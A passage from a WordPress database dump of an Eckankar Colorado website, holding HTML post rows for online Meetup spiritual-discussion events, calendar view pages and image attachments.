target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT Spiritual Discussion:<br>\"What is True Happiness?\"','','publish','closed','closed','','meetup-online-event-spiritual-discussionwhat-is-true-happiness','','','2021-03-21 12:52:12','2021-03-21 18:52:12','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264209',0,'tribe_events','',0),(264210,2,'2021-03-21 12:42:51','2021-03-21 18:42:51','','orange-tulips','','inherit','closed','closed','','orange-tulips','','','2021-03-21 12:42:51','2021-03-21 18:42:51','',264209,'https://eckankar-colorado.org/wp-content/uploads/2021/03/orange-tulips.jpg',0,'attachment','image/jpeg',0),(264220,2,'2021-03-21 12:56:36','2021-03-21 18:56:36','<p><span style=\"font-size: 18pt; color: #f28a27;\">- Do you want to discover a secret key to happiness?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">- Have you wondered why life is a mixture of happy and unhappy events?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">- Do you wish you had more happiness in your life?</span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong><br />\r\nSome people seem to be happy. Others appear to walk under a cloud of bad luck. Both of these groups have problems. What makes the difference? Which life would you like to live?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Your path to happiness is uniquely suited to you. The secret key is within. You and only you can take your next step to find it. Know that you do not have to make this journey alone. Inner guidance is always there for you to tap.<br />\r\n<br />\r\n</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt; color: #666666;\">“Start where you are, begin with what you have. Ask, “Where am I today? How can I build my own life with the help of the ECK (the Holy Spirit)?”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt; color: #666666;\">“Once you decide to act on it, you find out that there are a lot of other things that come with a decision like this. Change means going from one state of consciousness to another.”</span><br />\r\n<br />\r\n<span style=\"font-size: 11pt; color: #666666; padding-left: 40px;\">—By Harold Klemp, from the <em>Spiritual Wisdom Journal -</em> “What is True Happiness?”</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">Participants in this event can choose to take part in the discussion or just listen as others describe their progress in both the physical and invisible worlds in pursuit of true happiness. The discussion will be based on participant’s experience and the content from the ECKANKAR Spiritual Wisdom Journal focused on “What is true happiness?”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">During the discussion you will have the opportunity to participate in a spiritual exercise, the <strong>HU</strong>, a love song to God. <strong>HU</strong> is an undirected prayer that can open your consciousness to the guidance the Holy Spirit has for you. It is not meant to change your current beliefs but to enhance them.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the path of spiritual freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You may wish to explore the Spiritual Wisdom Journal titled “What is True Happiness?” It includes articles, stories, and a spiritual exercise to open yourself to love. This document can be read online or downloaded free at:</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><a class=\"link\" title=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2019.pdf\" href=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2019.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom Journal</a></span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/277068568/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT Spiritual Discussion:<br>\"What is True Happiness?\"','','publish','closed','closed','','meetup-online-event-spiritual-discussionwhat-is-true-happiness-2','','','2021-03-21 12:56:36','2021-03-21 18:56:36','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264220',0,'tribe_events','',0),(264229,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Full Calendar','','publish','closed','closed','','full-calendar','','','2021-03-24 12:10:14','2021-03-24 18:10:14','',0,'https://eckankar-colorado.org/?p=264229',0,'mec_calendars','',0),(264230,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Monthly View','','publish','closed','closed','','monthly-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264230',0,'mec_calendars','',0),(264231,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Weekly View','','publish','closed','closed','','weekly-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264231',0,'mec_calendars','',0),(264232,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Daily View','','publish','closed','closed','','daily-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264232',0,'mec_calendars','',0),(264233,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Map View','','publish','closed','closed','','map-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264233',0,'mec_calendars','',0),(264234,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Upcoming events (List)','','publish','closed','closed','','upcoming-events-list','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264234',0,'mec_calendars','',0),(264235,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Upcoming events (Grid)','','publish','closed','closed','','upcoming-events-grid','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264235',0,'mec_calendars','',0),(264236,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Carousel View','','publish','closed','closed','','carousel-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264236',0,'mec_calendars','',0),(264237,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Countdown View','','publish','closed','closed','','countdown-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264237',0,'mec_calendars','',0),(264238,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Slider View','','publish','closed','closed','','slider-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264238',0,'mec_calendars','',0),(264239,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Masonry View','','publish','closed','closed','','masonry-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264239',0,'mec_calendars','',0),(264240,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Agenda View','','publish','closed','closed','','agenda-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264240',0,'mec_calendars','',0),(264241,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Timetable View','','publish','closed','closed','','timetable-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264241',0,'mec_calendars','',0),(264242,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Tile View','','publish','closed','closed','','tile-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264242',0,'mec_calendars','',0),(264243,2,'2021-03-24 10:54:39','2021-03-24 16:54:39','MEC','Timeline View','','publish','closed','closed','','timeline-view','','','2021-03-24 10:54:39','2021-03-24 16:54:39','',0,'https://eckankar-colorado.org/?p=264243',0,'mec_calendars','',0),(264255,2,'2021-03-28 14:17:27','2021-03-28 20:17:27','<p>[ninja_form id=42]</p>','SOSE - Registration POPUP','','publish','closed','closed','','sose-registration-popup','','','2021-03-28 14:35:53','2021-03-28 20:35:53','',0,'https://eckankar-colorado.org/?post_type=popup&#038;p=264255',0,'popup','',0),(264262,2,'2021-03-28 20:13:53','2021-03-29 02:13:53','','Central Colorado Public Calendar-mec','','publish','closed','closed','','central-colorado-member-calendar-mec','','','2022-07-02 13:20:12','2022-07-02 19:20:12','',0,'https://eckankar-colorado.org/mec_calendars/central-colorado-member-calendar-mec/',0,'mec_calendars','',0),(264283,2,'2021-03-30 13:24:53','2021-03-30 19:24:53','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup','','','2021-03-30 13:24:53','2021-03-30 19:24:53','',0,'https://eckankar-colorado.org/?p=264283',0,'popup','',0),(264293,2,'2021-03-31 15:09:45','2021-03-31 21:09:45','<p><span style=\"font-size: 18pt; color: #de7e23;\">Do you ever wonder why you are here?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #de7e23;\">Are you looking for deeper meaning in your work or career?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #de7e23;\">Do you see how loving your children, spouse, and friends helps you fulfill your life’s purpose?<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #41527b; margin-top: -15px;\">\r\n<p><span style=\"color: #666666;\">“Giving God’s love to others is the reason we are here. God’s love comes to us directly from God and through others. Part of Soul’s lesson is to learn to somehow give this love back to life and to every living thing.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>Finding Your Life’s Purpose Pamphlet</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">Finding your life’s purpose is a journey to Self-Discovery and God-Discovery. This Meetup can help you in this journey. During this Meetup, we will share inspiration, stories, tips, and a spiritual exercise for finding and exploring your life’s purpose. Our goal is that each participant will gain new tools to help them realize their own life’s purpose.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To learn more about finding your life’s purpose, go to<strong> <a class=\"link\" title=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf.\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">here</a><span class=\"link\">.</span></strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.<br />\r\n<br />\r\n</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofBV/events/277283693/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p>&nbsp;</p>','MEETUP ONLINE EVENT<br>\"Finding Your Life\'s Purpose\" (Spiritual Adventure)','','publish','closed','closed','','meetup-online-eventfinding-your-lifes-purpose-spiritual-adventure','','','2021-03-31 15:30:11','2021-03-31 21:30:11','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264293',0,'tribe_events','',0),(264294,2,'2021-03-31 15:08:44','2021-03-31 21:08:44','','compass in hand','','inherit','closed','closed','','compass-in-hand','','','2021-03-31 15:08:44','2021-03-31 21:08:44','',264293,'https://eckankar-colorado.org/wp-content/uploads/2021/03/compass-in-hand.jpg',0,'attachment','image/jpeg',0),(264308,2,'2021-04-01 20:31:11','2021-04-02 02:31:11','<p><span style=\"font-size: 12pt;\"><span style=\"color: #c26b19;\"><strong><span style=\"font-size: 18pt;\">Please join us as we continue the Soul Adventures Series Meetups!</span></strong></span><br />\r\nSponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Spiritual experiences touch us at the very core of our being – Soul, the eternal, unique, divine spark of God who we really are. This series will help you to set out on your own Soul Adventures, by learning to recognize your spiritual experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within you!</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 12pt;\">The next two sessions will take place via Zoom on the following two Fridays from 7:00-8:00 pm:</span></strong></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><span style=\"color: #c26b19;\"><strong>Friday, 4/23/21</strong></span> - Exploring Past Lives and Reincarnation, based on this web page: <a class=\"link\" title=\"https://www.eckankar.org/experience/past-lives/\" href=\"https://www.eckankar.org/experience/past-lives/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Past Lives and Reincarnation</a></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><span style=\"color: #c26b19;\"><strong>Friday, 5/21/21</strong></span>- Exploring Soul Travel, on this web page: <a class=\"link\" title=\"https://www.eckankar.org/experience/soul-travel/\" href=\"https://www.eckankar.org/experience/soul-travel/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What Is Soul Travel?</a></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\">We invite you to explore these pages prior to the Meetup, and come with your questions! The Zoom meeting links for each Meetup will be provided after you RSVP that you are attending.</span><br />\r\n<br />\r\n</p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 13pt;\"><strong><span style=\"color: #c26b19;\">Past Lives and Reincarnation - Friday, 4/23/21:</span></strong></span></p>\r\n<blockquote class=\"\" style=\"border-color: #954c08; margin-left: 39px;\">\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 12pt;\">\"</span>Whatever your chosen religion or belief, that choice is necessary for you at this stage of your journey home to God. That’s why you hold it. Your religion or belief is a valuable and important part of you because it reflects all your experiences from past lives. Our spiritual heritage is far richer than a single lifetime could ever produce, the real reason many enter this life with a special gift or talent without the apparent need for learning it.<span style=\"font-size: 12pt;\">\"</span></strong> </span><br />\r\n<span style=\"color: #666666;\">—Harold Klemp</span></p>\r\n</blockquote>\r\n<p><br />\r\n<span style=\"font-size: 12pt;\">Join us for a spiritual discussion to help you better understand and appreciate your own lessons and memories from the past. The threads of your past lives are closer than you may think. Making the effort to explore them can bring greater freedom and happiness.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The discussion will be based on the following webpage, which provides valuable insights, stories, and spiritual exercises to help you better understand past lives and reincarnation: <a class=\"link\" title=\"https://www.eckankar.org/experience/past-lives/.\" href=\"https://www.eckankar.org/experience/past-lives/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Past Lives and Reincarnation</a>. We invite you to explore this page before the Meetup, and bring your questions!</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/277297461/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - ECK Soul Adventures:<br>Exploring Past Lives and Reincarnation','','publish','closed','closed','','meetup-online-eventtemplate-2','','','2021-04-01 20:53:48','2021-04-02 02:53:48','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264308',0,'tribe_events','',0),(264309,2,'2021-04-01 20:29:59','2021-04-02 02:29:59','','bw-2-walking','','inherit','closed','closed','','bw-2-walking','','','2021-04-01 20:29:59','2021-04-02 02:29:59','',264308,'https://eckankar-colorado.org/wp-content/uploads/2021/04/bw-2-walking.jpg',0,'attachment','image/jpeg',0),(264326,2,'2021-04-04 13:47:27','2021-04-04 19:47:27','','2021-May-ESC-Seminar-2','','inherit','closed','closed','','2021-may-esc-seminar-2','','','2021-04-04 13:47:27','2021-04-04 19:47:27','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/04/2021-May-ESC-Seminar-2.jpg',0,'attachment','image/jpeg',0),(264328,2,'2021-04-04 13:56:23','2021-04-04 19:56:23','','hero-orange-wildflowers-5','','inherit','closed','closed','','hero-orange-wildflowers-5','','','2021-04-04 13:56:23','2021-04-04 19:56:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/04/hero-orange-wildflowers-5.jpg',0,'attachment','image/jpeg',0),(264374,2,'2021-04-22 10:58:05','0000-00-00 00:00:00','<p><span style=\"color: #f28a27; font-size: 18pt;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\n<p><span style=\"color: #666666; font-size: 12pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\n<ul>\n	<li><span style=\"color: #666666; font-size: 12pt;\">Inner peace and calm</span></li>\n	<li><span style=\"color: #666666; font-size: 12pt;\">Divine love</span></li>\n	<li><span style=\"color: #666666; font-size: 12pt;\">Expanded awareness</span></li>\n	<li><span style=\"color: #666666; font-size: 12pt;\">Spiritual self-discovery and growth</span></li>\n	<li><span style=\"color: #666666; font-size: 12pt;\">Healing of the heart</span></li>\n</ul>\n<p><span style=\"color: #666666; font-size: 12pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>','Sound of Soul -- Zoom Online Template','','draft','closed','closed','','','','','2021-04-22 10:58:05','2021-04-22 16:58:05','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264374',0,'tribe_events','',0),(264379,2,'2021-04-11 14:02:40','2021-04-11 20:02:40','<!-- EVENT #1 -->\r\n<p><span style=\"color: #f28a27; font-size: 18pt;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<!-- EVENT #2 -->','ZOOM VIRTUAL EVENT <br>Experience the Sound Of Soul','','publish','closed','closed','','zoom-virtual-event-experience-the-sound-of-soul-register-now-2','','','2021-04-11 14:21:50','2021-04-11 20:21:50','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264379',0,'tribe_events','',0),(264411,0,'2021-04-14 16:41:13','2021-04-14 22:41:13','','','','publish','closed','closed','','264411','','','2021-04-14 16:41:13','2021-04-14 22:41:13','',0,'https://eckankar-colorado.org/nf_sub/264411/',0,'nf_sub','',0),(264415,2,'2021-04-16 09:04:30','2021-04-16 15:04:30','','Colorado Springs Public Calendar-mec','','publish','closed','closed','','colorado-springs-public-calendar-mec','','','2022-05-31 10:15:19','2022-05-31 16:15:19','',0,'https://eckankar-colorado.org/mec_calendars/colorado-springs-public-calendar-mec/',0,'mec_calendars','',0),(264416,2,'2021-05-09 12:53:12','2021-05-09 18:53:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Colorado Springs Public Calendar</p>\r\n<p class=\"\">[MEC id=\"264415\"]</p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Springs Public Calendar-mec','','publish','closed','closed','','colorado-springs-public-calendar-mec','','','2022-05-23 22:15:48','2022-05-24 04:15:48','',0,'https://eckankar-colorado.org/?page_id=264416',0,'page','',0),(264430,2,'2021-05-09 12:54:04','2021-05-09 18:54:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Loveland Public Calendar</p>\r\n<p>[MEC id=\"264431\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland Public Calendar-mec','','publish','closed','closed','','loveland-public-calendar-mec','','','2022-05-23 22:17:48','2022-05-24 04:17:48','',0,'https://eckankar-colorado.org/?page_id=264430',0,'page','',0),(264431,2,'2021-04-16 10:11:46','2021-04-16 16:11:46','','Loveland Public Calendar-mec','','publish','closed','closed','','loveland-public-calendar-mec','','','2022-06-07 21:01:56','2022-06-08 03:01:56','',0,'https://eckankar-colorado.org/mec_calendars/loveland-public-calendar-mec/',0,'mec_calendars','',0),(264437,2,'2021-05-09 12:54:21','2021-05-09 18:54:21','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Mountain Areas Public Calendar</p>\r\n<p>[MEC id=\"264438\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mountain Area Public Calendar-mec','','publish','closed','closed','','mountain-area-public-calendar-mec','','','2022-05-23 22:21:44','2022-05-24 04:21:44','',0,'https://eckankar-colorado.org/?page_id=264437',0,'page','',0),(264438,2,'2021-04-16 10:18:42','2021-04-16 16:18:42','','Mountain Area Public Calendar-mec','','publish','closed','closed','','mountain-areas-public-calendar-mec','','','2022-05-31 10:17:29','2022-05-31 16:17:29','',0,'https://eckankar-colorado.org/mec_calendars/mountain-areas-public-calendar-mec/',0,'mec_calendars','',0),(264440,2,'2021-04-24 11:14:38','2021-04-24 17:14:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Central Colorado Member Calendar</p>\r\n<p>[MEC id=\"264441\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Central Colorado Member Calendar-mec','','publish','closed','closed','','central-colorado-member-calendar-mec','','','2021-04-24 11:14:38','2021-04-24 17:14:38','',0,'https://eckankar-colorado.org/?page_id=264440',0,'page','',0),(264441,2,'2021-04-16 10:21:28','2021-04-16 16:21:28','','Central Colorado Member Calendar-mec','','publish','closed','closed','','central-colorado-member-calendar-mec-2','','','2021-05-09 13:52:35','2021-05-09 19:52:35','',0,'https://eckankar-colorado.org/mec_calendars/central-colorado-member-calendar-mec-2/',0,'mec_calendars','',0),(264443,2,'2021-05-09 12:53:10','2021-05-09 18:53:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Colorado Springs Member Calendar</p>\r\n<p>[MEC id=\"264444\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Springs Member Calendar-mec','','publish','closed','closed','','colorado-springs-member-calendar-mec','','','2021-05-11 09:07:51','2021-05-11 15:07:51','',0,'https://eckankar-colorado.org/?page_id=264443',0,'page','',0),(264444,2,'2021-04-16 10:23:22','2021-04-16 16:23:22','','Colorado Springs Member Calendar-mec','','publish','closed','closed','','colorado-springs-member-calendar-mec','','','2021-05-09 13:51:28','2021-05-09 19:51:28','',0,'https://eckankar-colorado.org/mec_calendars/colorado-springs-member-calendar-mec/',0,'mec_calendars','',0),(264446,2,'2021-05-09 12:53:56','2021-05-09 18:53:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Loveland Member Calendar</p>\r\n<p>[MEC id=\"264447\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland Member Calendar-mec','','publish','closed','closed','','loveland-member-calendar-mec','','','2021-05-09 12:53:56','2021-05-09 18:53:56','',0,'https://eckankar-colorado.org/?page_id=264446',0,'page','',0),(264447,2,'2021-04-16 10:25:07','2021-04-16 16:25:07','','Loveland Member Calendar-mec','','publish','closed','closed','','loveland-member-calendar-mec','','','2021-05-09 14:21:04','2021-05-09 20:21:04','',0,'https://eckankar-colorado.org/mec_calendars/loveland-member-calendar-mec/',0,'mec_calendars','',0),(264449,2,'2021-05-09 12:54:14','2021-05-09 18:54:14','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 75px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Mountain Area Member Calendar</p>\r\n<p>[MEC id=\"264450\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mountain Area Member Calendar-mec','','publish','closed','closed','','mountain-area-member-calendar-mec','','','2021-05-09 12:54:14','2021-05-09 18:54:14','',0,'https://eckankar-colorado.org/?page_id=264449',0,'page','',0),(264450,2,'2021-04-16 10:27:44','2021-04-16 16:27:44','','Mountain Area Member Calendar-mec','','publish','closed','closed','','mountain-area-member-calendar-mec','','','2021-05-09 13:48:51','2021-05-09 19:48:51','',0,'https://eckankar-colorado.org/mec_calendars/mountain-area-member-calendar-mec/',0,'mec_calendars','',0),(264550,2,'2021-04-18 19:51:53','2021-04-19 01:51:53','<div style=\"padding-bottom: 50px; color: #ffffff; background-color: rgba(29, 87, 145, 0.84);\" class=\"tmpl-schedule-2 boldgrid-section dynamic-gridblock background-scroll\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 10px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12\">\n<h2 class=\"color1-color\" style=\"font-family: Raleway; font-weight: 500; font-size: 40px; text-transform: capitalize;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Online Zoom Event</h2>\n<p class=\"\" style=\"font-size: 27px; margin-top: -15px;\">Join us for Eckankar in Colorado Virtual Events</p>\n</div>\n</div>\n<div class=\"row color1-background-color color-1-text-contrast bg-background-color\" style=\"margin-top: -11px; border-radius: 5px; margin-right: -15px; box-shadow: #e8e8e8 0px 0px 10px 4px; border: 0px solid #cccccc; padding-top: 0px;\">\n<div class=\"col-md-8 col-sm-8 col-xs-12 align-column-center\" style=\"padding: 1em; border: 0px solid #cee0e4;\">\n<p class=\"h4\" style=\"font-size: 28px; margin-right: 0px; padding: 0px; margin-left: 0px; margin-top: 0px; font-family: Open Sans; font-weight: 400; color: #1d5791;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><img class=\"bg-img bg-img-rounded-bottom-left bg-img-rounded-top-right alignleft wp-image-262345 \" style=\"margin-right: 13px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/eck-event-2.png\" alt=\"\" width=\"165\" height=\"101\"><strong>Experience The Sound of Soul<br>\n</strong></p>\n<div class=\"row bg-editor-hr-wrap\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<div>\n<p>&nbsp;</p>\n<div class=\"bg-hr bg-hr-2\" style=\"margin-left: -12px; margin-right: auto; width: 81%; margin-top: -13px; color: #1d5791;\"></div>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 600; font-size: 22px; margin-top: -10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">May 9, 2021 --&nbsp; 10:30 am to 11:30 am</p>\n<p class=\"\" style=\"font-size: 20px; font-family: Merienda One; margin-top: 1px; text-transform: capitalize; font-weight: 400; color: #1d5791;\" data-font-style=\"\" data-font-family=\"Merienda One\" data-font-weight=\"400\">You are warmly invited to this online event!</p>\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px; margin-top: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The experience will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart. The event will conclude with a short video clip of Harold Klemp, the Spiritual Leader of Eckankar.</p>\n<p class=\"\">cat</p>\n<p class=\"color3-color\" style=\"font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You will have the opportunity to experience some of the many benefits of 